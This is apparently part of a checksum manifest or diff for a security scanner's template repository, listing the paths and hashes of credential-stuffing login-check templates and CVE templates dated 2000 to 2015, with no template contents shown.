http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e -http/cves/2000/CVE-2000-0114.yaml:5a6c3732409232b01d2b38013363d49473394812 -http/cves/2001/CVE-2001-0537.yaml:455003ef8b334c603cad2ca2e8d0c8bc34d75540 -http/cves/2002/CVE-2002-1131.yaml:8ed47cd2cac9f195706603f9f42bc5eed3457ed3 -http/cves/2004/CVE-2004-0519.yaml:052772e4c28b6cb5db7e7461a29b93b52667ba24 -http/cves/2004/CVE-2004-1965.yaml:617a7d722ac156a4f7c74968d860c5cb727ec504 -http/cves/2005/CVE-2005-2428.yaml:b4650319c18701ea2a8e39eec67fc30874ec5e86 -http/cves/2005/CVE-2005-3344.yaml:6d8542d3d239a81b5a4f68ba3ea23470d03e3474 -http/cves/2005/CVE-2005-3634.yaml:74f3682efec82cd279416b90d7537c566f86529a -http/cves/2005/CVE-2005-4385.yaml:a181b6f9c9c48fd643697f624fe3f341c3343ca9 -http/cves/2006/CVE-2006-1681.yaml:de056576acfac07012f76f832d44cb1c7c937cf1 -http/cves/2006/CVE-2006-2842.yaml:9e84a315ef9c4ceed44ee1ce337c33db05fd0451 -http/cves/2007/CVE-2007-0885.yaml:5eb5693cae52d68a56318c7050ccc57390f73464 -http/cves/2007/CVE-2007-4504.yaml:9526c6674bfa78791849af4f9819b98f973cb33f -http/cves/2007/CVE-2007-4556.yaml:1a2c48b67d4451a8f9dc890a63eacf96acace5b9 -http/cves/2007/CVE-2007-5728.yaml:048877b1d7fffe78e776e5701a4056696a73979f -http/cves/2008/CVE-2008-1059.yaml:04bbe10bb9ac36e1266e9748545129760de0bdda -http/cves/2008/CVE-2008-1061.yaml:28b119302e8b96a6b7fe25969f2cf3787549db29 -http/cves/2008/CVE-2008-1547.yaml:ae82a05167ec393785dd08f6888200ab4f3e74b6 -http/cves/2008/CVE-2008-2398.yaml:188c08a586eb2b60fb644d3327387365dc53bf88 -http/cves/2008/CVE-2008-2650.yaml:f341a4e21806c93f688b98b32d95cf229a1b93f0 -http/cves/2008/CVE-2008-4668.yaml:85655631a436e9de6805165cc065706d558ee4eb -http/cves/2008/CVE-2008-4764.yaml:b75344318158bb8427e47a671a172c2e4c158d43 -http/cves/2008/CVE-2008-5587.yaml:b9ef60a3a398df6d4d815fe1d17bb09964194c2d -http/cves/2008/CVE-2008-6080.yaml:77611dcc807bfbf6ccc751d0010865a0030d6282 -http/cves/2008/CVE-2008-6172.yaml:aa430ce3b20e894791458556e34a1b56726978bc -http/cves/2008/CVE-2008-6222.yaml:7febc1afd4523fdbb3e8e879192f4d6000de9771 -http/cves/2008/CVE-2008-6465.yaml:296774187ea9c686508545443be2a2663e7d0150 -http/cves/2008/CVE-2008-6668.yaml:09669c99e93892eb39e56b3439ff75d3437ef6ed -http/cves/2008/CVE-2008-6982.yaml:140701ad935bb817dfee16110e396feec2440077 -http/cves/2008/CVE-2008-7269.yaml:bc530c23a4dd76182e3f8eb4ecbdd75fe4740a93 -http/cves/2009/CVE-2009-0347.yaml:0e04689539ba0fcabcc490595d1a6c960051b6dc -http/cves/2009/CVE-2009-0545.yaml:edc3f8c9f6cd9720c5da4eade33953fba8e51110 -http/cves/2009/CVE-2009-0932.yaml:4be0595efe027fd706df42e871f730d407e6c71e -http/cves/2009/CVE-2009-1151.yaml:7e35f1bb52fbe67115b5b9689aecf53f03430350 -http/cves/2009/CVE-2009-1496.yaml:1071b0e119f0becca281f1a02d18e1880b85afdc -http/cves/2009/CVE-2009-1558.yaml:8721c9242f01d1bb9844e38b54e7f6f582651332 -http/cves/2009/CVE-2009-1872.yaml:ab58908a83c1c41c372bf02dc3668a571c360a52 -http/cves/2009/CVE-2009-2015.yaml:36da21c4776c4919bdc956089e5cac8cbf66ddd7 -http/cves/2009/CVE-2009-2100.yaml:c6f1ee5e269239242212c0baec9f8e5a3e54084b -http/cves/2009/CVE-2009-3053.yaml:d758815602155b718c0b32a7e0335d8ce0ce53b4 -http/cves/2009/CVE-2009-3318.yaml:caa52041806dc22c9bd66ab4fe7838c790978229 -http/cves/2009/CVE-2009-4202.yaml:cac0b2fe2add3c0854b5b6cca02b0b65f1014e76 -http/cves/2009/CVE-2009-4223.yaml:b203dd3fd40c2513e5ed66803bb290231575525a -http/cves/2009/CVE-2009-4679.yaml:4f47981fa93f3378ad8656ce6f08f135e1283f43 -http/cves/2009/CVE-2009-5020.yaml:e7deb4ec5a8781d4e04e93f4da6f73e290cd2e53 -http/cves/2009/CVE-2009-5114.yaml:f5633b47d9a210839a27e3c8c40b93d82e843312 -http/cves/2010/CVE-2010-0157.yaml:f9661050cf2ce2f941a5b6344a30ff32ac537e70 -http/cves/2010/CVE-2010-0219.yaml:3e3117d8bc1ef4df91af41ae74076e031f608268 -http/cves/2010/CVE-2010-0467.yaml:b53b01ba669b4e7fb606a912e9222e8f5f85e33e -http/cves/2010/CVE-2010-0696.yaml:323221cd432804327112648173151075f149ca1f -http/cves/2010/CVE-2010-0759.yaml:d383e3940394d70525349618f3a15f1639456aba -http/cves/2010/CVE-2010-0942.yaml:232509566f5d60dd01bc9f3b623d95f8b10beb65 -http/cves/2010/CVE-2010-0943.yaml:de55ac02349f465c754c034eb30e728fa21bb440 -http/cves/2010/CVE-2010-0944.yaml:b43be1e86f6b9c28a98a4db01a0eb7579c16bd19 -http/cves/2010/CVE-2010-0972.yaml:7254165d57dad8b29a41f7b5bc4aebdcec2819b7 -http/cves/2010/CVE-2010-0982.yaml:0ffbcf4b1b794c0138553f6ad08ebca9a024ade6 -http/cves/2010/CVE-2010-0985.yaml:7381c58e68ec654a46510a0d2ee235e854a806f9 -http/cves/2010/CVE-2010-1056.yaml:c124ff9f0ae659f1cebb22954ef8c56d672f1709 -http/cves/2010/CVE-2010-1081.yaml:97370b3a1cb1aa39795feaffb80e5ad2bf410e93 -http/cves/2010/CVE-2010-1217.yaml:576dae5ff62a7fb3ceab2f501b5f5ef91fa13669 -http/cves/2010/CVE-2010-1219.yaml:8ee97c2a3a9e14669adb5c1ef74ded7753d87881 -http/cves/2010/CVE-2010-1302.yaml:247d4768fd1b3a7f1b5c49669944151c25d44ef1 -http/cves/2010/CVE-2010-1304.yaml:a9b7eab403453ba2692a02f460ea6260c5b6a943 -http/cves/2010/CVE-2010-1305.yaml:23ea9b94373c5383527ad717c9e6c945f91bc7d9 -http/cves/2010/CVE-2010-1306.yaml:f09e086d8495b5518ff5f735db49a6ea4ed504f0 -http/cves/2010/CVE-2010-1307.yaml:316d59f13a952be9274fe385c60b380c7b1893dd -http/cves/2010/CVE-2010-1308.yaml:0a442752938fecd4192a2189337a25a16d367b21 -http/cves/2010/CVE-2010-1312.yaml:04a3db0db624a4102d8c8c73bc31371f3f2e1f64 -http/cves/2010/CVE-2010-1313.yaml:d7d36b8c98be2c6019fd1648a2b2f39386a5dc3c -http/cves/2010/CVE-2010-1314.yaml:e59a0553a36ed82ade9fcb596317d6025095a7a2 -http/cves/2010/CVE-2010-1315.yaml:626480c2668dbbd579d91032776d8570f60bb08d -http/cves/2010/CVE-2010-1340.yaml:63c36cc7e4454a75d08e6941b20e5f0b22c4e275 -http/cves/2010/CVE-2010-1345.yaml:797955be580f957dbbd9a222d62efa2a5e785d24 -http/cves/2010/CVE-2010-1352.yaml:c34f8e183c7ffffe1e0d10ffbb91ef536f734f5f -http/cves/2010/CVE-2010-1353.yaml:b1dc2f992ae48619f186dc2cfd38dc384375ae58 -http/cves/2010/CVE-2010-1354.yaml:73d3c12438f749648dd31fc827dd941cff94d6a9 -http/cves/2010/CVE-2010-1429.yaml:105bb300841e932c16158518908e925c4f2dc722 -http/cves/2010/CVE-2010-1461.yaml:d0baf9b5bb17eaeec9f5c5b5acdfb6d987a17c9b -http/cves/2010/CVE-2010-1469.yaml:f40d06e4d49ccb535b24b18d6d39091820197bcd -http/cves/2010/CVE-2010-1470.yaml:f873aa5a80b5918e2dd71dfe2db1a6f13e870141 -http/cves/2010/CVE-2010-1471.yaml:93c4ed34853a068c3d4ef639fe9c095bb2f1df79 -http/cves/2010/CVE-2010-1472.yaml:1d77fd63ef6b391bd349cf909c8fcd6d5dfe3a51 -http/cves/2010/CVE-2010-1473.yaml:fcbe4dd0d3c1faed314bac34f2071a9dce33e047 -http/cves/2010/CVE-2010-1474.yaml:782c315fa466add72f1b000c8ece3de4f2bbcff7 -http/cves/2010/CVE-2010-1475.yaml:615a9c48bd5c191471ff16b6db4961f2e7017ce6 -http/cves/2010/CVE-2010-1476.yaml:b55beba58729736932a640c170a4a87603fcefbe -http/cves/2010/CVE-2010-1478.yaml:8f573313c4f82363f0a5c65f8b62741affd527c5 -http/cves/2010/CVE-2010-1491.yaml:9b5bbc38e320e0bee87e27418d8bc8e36ef0519d -http/cves/2010/CVE-2010-1494.yaml:9f736cd5c50f1d82528d80f2a005590fffb50327 -http/cves/2010/CVE-2010-1495.yaml:4cccfbbb46f52bdb296873d656725890e8e4ddb0 -http/cves/2010/CVE-2010-1531.yaml:a912976b8e3f92880396a17ba2fd8145289d85ff -http/cves/2010/CVE-2010-1532.yaml:d57e822d341607aecb07ff3c51fef167b9541775 -http/cves/2010/CVE-2010-1533.yaml:a12acf16bff066a1ce988a3a823e8c534741742f -http/cves/2010/CVE-2010-1534.yaml:9b5aabe5d333f7a52a5f005dfe5495ef859335e8 -http/cves/2010/CVE-2010-1535.yaml:be600a4aa26ba22c47d19475b2bd688e442dfa82 -http/cves/2010/CVE-2010-1540.yaml:e5b8a8ae7dc17728bedde500fbb01153f49fa1ea -http/cves/2010/CVE-2010-1586.yaml:0675248bce169015d04d5f77677e5932a818cb74 -http/cves/2010/CVE-2010-1601.yaml:7385a7b72d3b7aba9528de2f545fcfc9277d830b -http/cves/2010/CVE-2010-1602.yaml:bd1dc1eddd16a9ca8b07678d5d58f588bd9dfa3a -http/cves/2010/CVE-2010-1603.yaml:42a168c2b51aa53f67392e404aac6ecc9533faea -http/cves/2010/CVE-2010-1607.yaml:8066ea991faefad114ecd06cb4bafaa04790dea9 -http/cves/2010/CVE-2010-1653.yaml:587b610c4cb0d2d5236b9ee4d5de0db2b9246844 -http/cves/2010/CVE-2010-1657.yaml:f17bc23675f7b6bf60b42d2fe8b25d572c9b3788 -http/cves/2010/CVE-2010-1658.yaml:fd5ba2ff52b549ff9cff4c16ebcc8d18915a4673 -http/cves/2010/CVE-2010-1659.yaml:b3735603358090157b2a29cba5e9d960ddd0327f -http/cves/2010/CVE-2010-1714.yaml:60c04ca8cf6ef4a0523367800971a283ae6a10ad -http/cves/2010/CVE-2010-1715.yaml:e0e3ccb142ef5aaa0b754072e8c5804072a5f9df -http/cves/2010/CVE-2010-1717.yaml:4f1abbdd01959625764603f2a5a9735df04a4d45 -http/cves/2010/CVE-2010-1718.yaml:e1ffc4288bf74daf1e7bf7611a9621878e26be52 -http/cves/2010/CVE-2010-1719.yaml:ea92481503b9b78fccf7122498445c0ad27a081e -http/cves/2010/CVE-2010-1722.yaml:29a9882c9addaadee4b337bdeb43fd729be920a1 -http/cves/2010/CVE-2010-1723.yaml:4e0f274888dfd4b5465038265683f2afb6a146b3 -http/cves/2010/CVE-2010-1858.yaml:c7a7be6488da302775b496dee868071fdb7300bf -http/cves/2010/CVE-2010-1870.yaml:19b89ca6b8c8c497bf707ef470231cbdad0a8697 -http/cves/2010/CVE-2010-1875.yaml:6419a189729cf0662d9f28378d04f4b4f1298296 -http/cves/2010/CVE-2010-1878.yaml:ca23c2a6b8a2ab42f522afee3d3e498c5b6a7a6e -http/cves/2010/CVE-2010-1952.yaml:c9711dc08c228cdec9ac4b42c4513ed613832963 -http/cves/2010/CVE-2010-1953.yaml:494e3bca1cf71cc76409d0199021e3aeb9d98fa3 -http/cves/2010/CVE-2010-1954.yaml:d9aa4b64caacc6d17a06ac8ead4ff604cb7e2aed -http/cves/2010/CVE-2010-1955.yaml:481eb01dfbb008542578196a17814500c7fa1490 -http/cves/2010/CVE-2010-1956.yaml:537a55f15bf30049045fa511205d2c7055609ef3 -http/cves/2010/CVE-2010-1957.yaml:b6db0f1965786ee17333fb7bba2d959130572a05 -http/cves/2010/CVE-2010-1977.yaml:ecd1662ca5533c37f720203e3b7d95ff1b537033 -http/cves/2010/CVE-2010-1979.yaml:c1cae88048ff793ca4856f26518b63e8f2bc53a9 -http/cves/2010/CVE-2010-1980.yaml:a5d5e9d0748b1b94bbdd3db4302b2cdb98e32ab4 -http/cves/2010/CVE-2010-1981.yaml:c004c7559296034a5953e52bea2f493ac46e9cb9 -http/cves/2010/CVE-2010-1982.yaml:d5ebe7d9e58c3cd72f297c91ca26be565328b2b8 -http/cves/2010/CVE-2010-1983.yaml:87de2e3fe60ca6958343e8b93fc541f6ac549f3f -http/cves/2010/CVE-2010-2033.yaml:b9faf163a0ed2b5a1a6e0782fb728c024e3c39cf -http/cves/2010/CVE-2010-2034.yaml:e9529e6262a407e84797798d13488ed01a11cd78 -http/cves/2010/CVE-2010-2035.yaml:689963e2357e68f29dc0b4d231f73eb76e6a578a -http/cves/2010/CVE-2010-2036.yaml:a30f7f3fd83ef0df671b8c560876343f0783dcc2 -http/cves/2010/CVE-2010-2037.yaml:5ab02e2690a689fccbc9806913b0eba7601dad83 -http/cves/2010/CVE-2010-2045.yaml:a4edfdd55b604771df3c1c998d0530b04aaae309 -http/cves/2010/CVE-2010-2050.yaml:e37da9b3109b6be04ffa1107ebc2585a3fb6a239 -http/cves/2010/CVE-2010-2122.yaml:8078e07365d991d99f019f768a84158fc962de3c -http/cves/2010/CVE-2010-2128.yaml:f20aced0104077bdc69ee2b02a32293f3690e087 -http/cves/2010/CVE-2010-2259.yaml:f5e90d598412ecf8bcc45094ca6983612b1f4bf9 -http/cves/2010/CVE-2010-2307.yaml:e91dc0a35faf2b87c191e7c3d32cafb6d91aaec5 -http/cves/2010/CVE-2010-2507.yaml:57895c87aeced28c8425291e78ab26ae0bc9b63e -http/cves/2010/CVE-2010-2680.yaml:79a02a252f2cc6f96bc507129f9010fca7e3c700 -http/cves/2010/CVE-2010-2682.yaml:d836bff14908ac9f6a74f03970114a458fbf3215 -http/cves/2010/CVE-2010-2857.yaml:a4d42c5c3f276315cf4f4f64bffe92f4c34a3e72 -http/cves/2010/CVE-2010-2861.yaml:f7e8d72c374883adcd934354db4d9d0a145df1c1 -http/cves/2010/CVE-2010-2918.yaml:7167702407264359dfcb1107c48a71ea5f32c08e -http/cves/2010/CVE-2010-2920.yaml:89f41a4f882c821bb786be751391e6618759755a -http/cves/2010/CVE-2010-3203.yaml:de6733ce711f6f0af707b3fb793b27b1b0b2f7c1 -http/cves/2010/CVE-2010-3426.yaml:be4058150c17e9167201391493623a2ac45abab7 -http/cves/2010/CVE-2010-4231.yaml:de1c849074492a7554c8b5791510654227f9a8fd -http/cves/2010/CVE-2010-4239.yaml:146b2169e4556a146e243f0fb9f46eecb03a6e22 -http/cves/2010/CVE-2010-4282.yaml:00e272eb1d3a9ef9a88529cbb149ad2a824abcca -http/cves/2010/CVE-2010-4617.yaml:091ea79c9dfae2fb0d29d19876b5b2d507e3233e -http/cves/2010/CVE-2010-4719.yaml:d842bea4a1a0c22fa7852b05e77dce2a7c245c2e -http/cves/2010/CVE-2010-4769.yaml:0d7cb9c25a56bc9a8ff4594d1df07c3072c9c6b6 -http/cves/2010/CVE-2010-4977.yaml:25380987a2d20099119f70625965bc2ec53cb12e -http/cves/2010/CVE-2010-5028.yaml:d7ea0fe81cfa7f0ef16984fbeb932fac977ba074 -http/cves/2010/CVE-2010-5278.yaml:225f3da4f7d917c484392ffb8f99aa3913d08f6b -http/cves/2010/CVE-2010-5286.yaml:ac4a6f51be25823e193b5e1cec138029819ec96c -http/cves/2011/CVE-2011-0049.yaml:71a730fa8700d6f572a6e10f28e4553502d4ffa4 -http/cves/2011/CVE-2011-1669.yaml:a7050758d646c91bc9ca13868b537c6e2d518348 -http/cves/2011/CVE-2011-2744.yaml:5e68ab903c00ecce1d30918714dbfaeff6dab86c -http/cves/2011/CVE-2011-2780.yaml:a16b5014374761ed37761b9d27e604f12f0ec971 -http/cves/2011/CVE-2011-3315.yaml:f94abd71bcf3aab3e0960dc4cbcf3f928ab36720 -http/cves/2011/CVE-2011-4336.yaml:91657343020f7d10a62c860bb401253f39826c8b -http/cves/2011/CVE-2011-4618.yaml:e354cebb6124a25782745896d73b5ba36c9858d6 -http/cves/2011/CVE-2011-4624.yaml:fabc7109beca3fbfb01ba23ebbc20e18b5f163a4 -http/cves/2011/CVE-2011-4804.yaml:74c16ad7a92538315d41d419b696149a0828263d -http/cves/2011/CVE-2011-4926.yaml:a295cf2be1a2865428a5ba954f103abd300af164 -http/cves/2011/CVE-2011-5106.yaml:bc75b960927f16e7772d328001d9dff25063c4ab -http/cves/2011/CVE-2011-5107.yaml:c7d3b284db24de085c5677fdb3739838f5541f43 -http/cves/2011/CVE-2011-5179.yaml:57b8dbc3fefa21ed2779e0a0380d1461823f0df5 -http/cves/2011/CVE-2011-5181.yaml:672b51c0036ca00b0549550a67c127d1500518fe -http/cves/2011/CVE-2011-5252.yaml:e9b843acce2e6827ae8c3735c527b89f76e83ed5 -http/cves/2011/CVE-2011-5265.yaml:97bacd64f3424b475daf83af4800a91c98b54095 -http/cves/2012/CVE-2012-0392.yaml:55daa288c50c599027ac0b94c06002b960ad2fa6 -http/cves/2012/CVE-2012-0394.yaml:1c5c0486468030ad39ed91ebb1c1c5577795b607 -http/cves/2012/CVE-2012-0896.yaml:093d87535bf69fbcf21afaef7f0f883bfc3fd2f8 -http/cves/2012/CVE-2012-0901.yaml:2cc4c2e230574df7c66609423247a8b48e9a35fb -http/cves/2012/CVE-2012-0981.yaml:a083ef7bcb4995e68538a480e1177e9dc0ebb10d -http/cves/2012/CVE-2012-0991.yaml:eeddcc9c9a568abb1b38f3701f09b5c75b91949c -http/cves/2012/CVE-2012-0996.yaml:22bcd6f6aa8c27e790edc62f388a94fd60f5b5a9 -http/cves/2012/CVE-2012-1226.yaml:497f8d3c3bc5972456f70c89063d30c56f06985f -http/cves/2012/CVE-2012-1823.yaml:3afe3c483f65ad437a84863219a3172e999e6b99 -http/cves/2012/CVE-2012-1835.yaml:25a181c84f345566a86181cb0b7ccda19054d3fa -http/cves/2012/CVE-2012-2371.yaml:e694579be17f8484bb6a515cba11836b6f48060c -http/cves/2012/CVE-2012-3153.yaml:1cec9766ab1e14966b9539302ea46abff97ed8d2 -http/cves/2012/CVE-2012-4032.yaml:7c6d7a7ddfb7f267b8bfc1e2c90adb7f614603ca -http/cves/2012/CVE-2012-4242.yaml:af4b84accee718c84f9cd6fe48998dca2192541a -http/cves/2012/CVE-2012-4253.yaml:95836dcee5967a93dd30e5763f784b1910319df8 -http/cves/2012/CVE-2012-4273.yaml:f3d79b9cd39edbe7899b196c342da46ab0736117 -http/cves/2012/CVE-2012-4547.yaml:b810336be9d399a06f4ddff17fd60b544571076d -http/cves/2012/CVE-2012-4768.yaml:994cd1b08400db2f0f1013f89ca2d11a5951bbf8 -http/cves/2012/CVE-2012-4878.yaml:c771f19c878d432651f2942f2af63c4bf46841bb -http/cves/2012/CVE-2012-4889.yaml:d18a32666b5e06309a677238a3db6d19c14e68bd -http/cves/2012/CVE-2012-4940.yaml:45312d0b3d8c68b4044eeb155e655063b9a5dc96 -http/cves/2012/CVE-2012-4982.yaml:783e243d2d9ace4af2e81c6d8bb4acf5020a5f64 -http/cves/2012/CVE-2012-5321.yaml:8f7a3d33c07e3d9806603bcc5417a1e4333afdea -http/cves/2012/CVE-2012-5913.yaml:f65958bf9af5ccbffbc85880a99f3a6709595c62 -http/cves/2012/CVE-2012-6499.yaml:c059fdc1733b2c63ea90f5985e95a8f34865029e -http/cves/2013/CVE-2013-1965.yaml:42c59db5c13d726a5d55347d852870ad9da87ae2 -http/cves/2013/CVE-2013-2248.yaml:21ea8d8170a3932017cf6e3a4f6778954e124377 -http/cves/2013/CVE-2013-2251.yaml:c331a6f08b014ed6afcbcb2160de5dbe70c47ef4 -http/cves/2013/CVE-2013-2287.yaml:5984c54074ed5902789af34c22e8e821800f1931 -http/cves/2013/CVE-2013-2621.yaml:a795f5715fc05bb95fea4e118bb1b233211270f5 -http/cves/2013/CVE-2013-3526.yaml:914669676530b918243a789ea719296dd160b8cc -http/cves/2013/CVE-2013-3827.yaml:e1eb8efa9eb6411429a3db4566db793a1f9c9d91 -http/cves/2013/CVE-2013-4117.yaml:041d8964f41840150a2aa32cb02406f3e51f95ed -http/cves/2013/CVE-2013-4625.yaml:b74769bf56c044e593c3748b730613def2ec77ec -http/cves/2013/CVE-2013-5528.yaml:7fa17e93a5e929453f719c7bdda9cebfdf69f9e9 -http/cves/2013/CVE-2013-5979.yaml:36023e943cf8fc8fef44229a233bf1462b042036 -http/cves/2013/CVE-2013-6281.yaml:c3988c2c050f8dcc59978d8bc650610613537fad -http/cves/2013/CVE-2013-7091.yaml:818cad2534df13c2243c9157006071619ded6781 -http/cves/2013/CVE-2013-7240.yaml:12821ec5b78cefe373ccab4eed6ba3c4661bc1ce -http/cves/2013/CVE-2013-7285.yaml:eefa00f1ee45a4f1f9721c29ea897c629d956c00 -http/cves/2014/CVE-2014-10037.yaml:c1c0d77678244828ca52283b79743801f328074c -http/cves/2014/CVE-2014-1203.yaml:f29bfa6b0728d09ce895297a52f69140df3fccb7 -http/cves/2014/CVE-2014-2321.yaml:c97a20f56411273bd92037ab7397c3579c08a073 -http/cves/2014/CVE-2014-2323.yaml:e5a19ee17231ff172dae361a4889c0487693a9aa -http/cves/2014/CVE-2014-2383.yaml:37284308afeefc7ee0705f999dc83b3694a022aa -http/cves/2014/CVE-2014-2908.yaml:cfd2a4d01ba7c367444711e7ffdc871ea121f229 -http/cves/2014/CVE-2014-2962.yaml:60b9239e83911af21db27fcb297447c8288c2820 -http/cves/2014/CVE-2014-3120.yaml:dbe41861c51af84a4282600cd5d20338f0e90daa -http/cves/2014/CVE-2014-3206.yaml:857b41357350d33da2e738a33d828c5902172a79 -http/cves/2014/CVE-2014-3704.yaml:f09fc4cc32fd932710784dfc5e737a2550e8cc2e -http/cves/2014/CVE-2014-3744.yaml:7b02eb4a9d55da8ef985361ff8fb362336882101 -http/cves/2014/CVE-2014-4210.yaml:b62ca88383740cddd73251ffb0659f94a22351d2 -http/cves/2014/CVE-2014-4513.yaml:ee009ee7fc336a12bb2d2b306ba005961f90c00d -http/cves/2014/CVE-2014-4535.yaml:8d68af025c973f5a304d2fd26d979e4719b4741c -http/cves/2014/CVE-2014-4536.yaml:fff4ca6c291f33497ee91ec6e5599ca022974e9e -http/cves/2014/CVE-2014-4539.yaml:e446390e6e7ea24acd9810a75b2fa3159f916b65 -http/cves/2014/CVE-2014-4544.yaml:b8baaeeaf128bd48fac0aff5cc114a13a271da89 -http/cves/2014/CVE-2014-4550.yaml:1f6ef677d98616aa1639d3eb125dbfe66ddde3e4 -http/cves/2014/CVE-2014-4558.yaml:93aad3f095ccb944624acdd4e171f8a6c124eee1 -http/cves/2014/CVE-2014-4561.yaml:365c4ba42ec7e4747ba9c0bfffe7d9d733705d74 -http/cves/2014/CVE-2014-4592.yaml:c007d29f87f42d316aa0675b82214ea27a1607b4 -http/cves/2014/CVE-2014-4940.yaml:9bd0f3ca9906f19bbdb56a6c81a67afb9c059d9b -http/cves/2014/CVE-2014-4942.yaml:70c0293e0d2db87b0923dfe3f54c57d4ea26d3a4 -http/cves/2014/CVE-2014-5111.yaml:11242cc2f976ea74fd44f7a2303d48189e7a1158 -http/cves/2014/CVE-2014-5258.yaml:89087c899be7dfacb44f592f7e9afcf0e204be68 -http/cves/2014/CVE-2014-5368.yaml:cc4caf43497442f56df17f7837a66db9158cc532 -http/cves/2014/CVE-2014-6271.yaml:5929e6f59adab1c421dc1363eb192d4e683cd438 -http/cves/2014/CVE-2014-6287.yaml:972ec722ad4aebff44b96ca0f12d380d4e3fb8e4 -http/cves/2014/CVE-2014-6308.yaml:d345e5f2b36d68e8a737e62768bf9b496ac5af85 -http/cves/2014/CVE-2014-8676.yaml:8e0070d34308781cb21e44d17754deef3d03a223 -http/cves/2014/CVE-2014-8682.yaml:f2024e758fc90d5975d85694f26ea1c9dabf700e -http/cves/2014/CVE-2014-8799.yaml:8f760046252d8cb4267a7492d75dcd4e3babc802 -http/cves/2014/CVE-2014-9094.yaml:e2665107aaf09b32ec5ed1576cfb61fdaa048bca -http/cves/2014/CVE-2014-9119.yaml:567e1370d911a6bb501e3a9ab529890a05ed28d9 -http/cves/2014/CVE-2014-9444.yaml:f665ead66b03334e1f27adc31a86f2c054a6a21e -http/cves/2014/CVE-2014-9606.yaml:0f996c3cd14b4766d28702028c4369ec71dcac9d -http/cves/2014/CVE-2014-9607.yaml:a01206c2327e0c968b534884e7ad52afb8fc7f00 -http/cves/2014/CVE-2014-9608.yaml:a027afa0427e23c488b4b8259af7319c0a335ca8 -http/cves/2014/CVE-2014-9609.yaml:e26a8cca5a996894c996445678bf307ab3c7a472 -http/cves/2014/CVE-2014-9614.yaml:2154d4f90f0bcbea7d47576f7bc73797b0e4921a -http/cves/2014/CVE-2014-9615.yaml:aafa2f766e389aa8acfc203c8fe0941bc1c6074a -http/cves/2014/CVE-2014-9617.yaml:11d6ecb240bf812a0da87f06f6d6916663637e4e -http/cves/2014/CVE-2014-9618.yaml:2aaff17fad000482828a26967e7984576cd330de -http/cves/2015/CVE-2015-0554.yaml:9adb9d04db05d4177ea1076f692cec9e74061ad9 -http/cves/2015/CVE-2015-1000005.yaml:154c9b179404d19cf26767fa2be69f4111daeaa1 -http/cves/2015/CVE-2015-1000010.yaml:08c6aab9b4a16cccf7d97d84b53ba7b3d635c298 -http/cves/2015/CVE-2015-1000012.yaml:6342dc598d459acf7b713a6495210cdf56891614 -http/cves/2015/CVE-2015-1427.yaml:7f0d9541ae1fc875f7c80eed9a73676ef35938df -http/cves/2015/CVE-2015-1503.yaml:486e355eff41bddc4aeee45899e970b6130bc413 -http/cves/2015/CVE-2015-1579.yaml:a004c81e0b639f7dbc077cd228e49786c9fb184f -http/cves/2015/CVE-2015-1880.yaml:9f2fb195d3762198ac818b3d1fe33c12779bbb8e -http/cves/2015/CVE-2015-2067.yaml:4353ea509e538ec517090cba392a9309e051453e -http/cves/2015/CVE-2015-2068.yaml:018571eb84a732e3de13e1b31dcf92d34c44b4fc -http/cves/2015/CVE-2015-2080.yaml:78df88413a6a25168baaf82a9e1a793ee1dc5051 -http/cves/2015/CVE-2015-2166.yaml:fd9221c42a4bbd10de9aecbf6079a1eab2c3dc4b -http/cves/2015/CVE-2015-2196.yaml:41b0ee45486ac11f1a9ba9053f429b54b34d11fe -http/cves/2015/CVE-2015-2755.yaml:95eb75e63cb800f1c4be4775e4ad2375fc05ccab -http/cves/2015/CVE-2015-2807.yaml:84b1c63192f140ad75e35f6385d78d8bc9ce7d95 -http/cves/2015/CVE-2015-2863.yaml:6eab1fda1ab3b928089e7c5214e71fb3ae7d494b -http/cves/2015/CVE-2015-2996.yaml:985f21ce199ede67c61232f7d23a67d669e4cbbc -http/cves/2015/CVE-2015-3035.yaml:12eb8d6bfc6bed7b14d8e8902b418128ca5713a5 -http/cves/2015/CVE-2015-3224.yaml:8f3e4c6de17559cf452d5e9673de2db1496df3b2 -http/cves/2015/CVE-2015-3337.yaml:75a330644881a0ca799c8d08f4f3bedc8600d03b -http/cves/2015/CVE-2015-3648.yaml:1cf25f502b3a27d76fa1eb1101220af26bcfdf2a -http/cves/2015/CVE-2015-3897.yaml:899190f60b84f18d6f58f5786ef07e6cf14cfdb8 -http/cves/2015/CVE-2015-4050.yaml:8e814e0d23791ab1d8a4dc2803b9497ba9848d70 -http/cves/2015/CVE-2015-4062.yaml:de8a7d9ae1584ec07d519a71eaeb76e8c4238b7c -http/cves/2015/CVE-2015-4063.yaml:23263603f31c1ca71942c5c9300a50552d004ebb -http/cves/2015/CVE-2015-4074.yaml:2604ba725724126f8c0147e42ae8d0288fade148 -http/cves/2015/CVE-2015-4127.yaml:bf9938af47d0e5741c4259448fe4e2ef6e136c20 -http/cves/2015/CVE-2015-4414.yaml:73f7871f5fbe189ba706a5a68a08495e4ea82336 -http/cves/2015/CVE-2015-4632.yaml:e77a7bdf3a052dde2b623c4363ca603395b1f1c3 -http/cves/2015/CVE-2015-4666.yaml:0f9e5bf864ba7a683965087e1fd4480d43bbd656 -http/cves/2015/CVE-2015-4668.yaml:95bbc7889f039e863c50861edcc2955f336018cc -http/cves/2015/CVE-2015-4694.yaml:080333b5416a0f6cbf334cd9c87f4ef94fe3955c -http/cves/2015/CVE-2015-5354.yaml:386d9701fb12d368e6fbedad7e3900df023994ef -http/cves/2015/CVE-2015-5461.yaml:b334b8d48310cdec73353dc9c3abcec9b7f8f3c5 -http/cves/2015/CVE-2015-5469.yaml:8b1d92eb17f1a0d7c7d423215729115329cca9ad -http/cves/2015/CVE-2015-5471.yaml:ab63999daad5928151ae90a008396742b0b3438c -http/cves/2015/CVE-2015-5531.yaml:6b105a48198df39573f639c09c1f75fc2eb072f3 -http/cves/2015/CVE-2015-5688.yaml:9042f54a957986b0e3b914ab75a86c4f0be252ef -http/cves/2015/CVE-2015-6477.yaml:1c4f12c96a6826ef23ec95e3a8f1d3ae13afe5ed -http/cves/2015/CVE-2015-6544.yaml:f7f997a036a1168ff71c8ece24677254b0c7f672 -http/cves/2015/CVE-2015-6920.yaml:9e18e10162fd80ac322970da7cd943011455ea6d -http/cves/2015/CVE-2015-7245.yaml:f1b73f82195f40136938478c8899609004c839a9 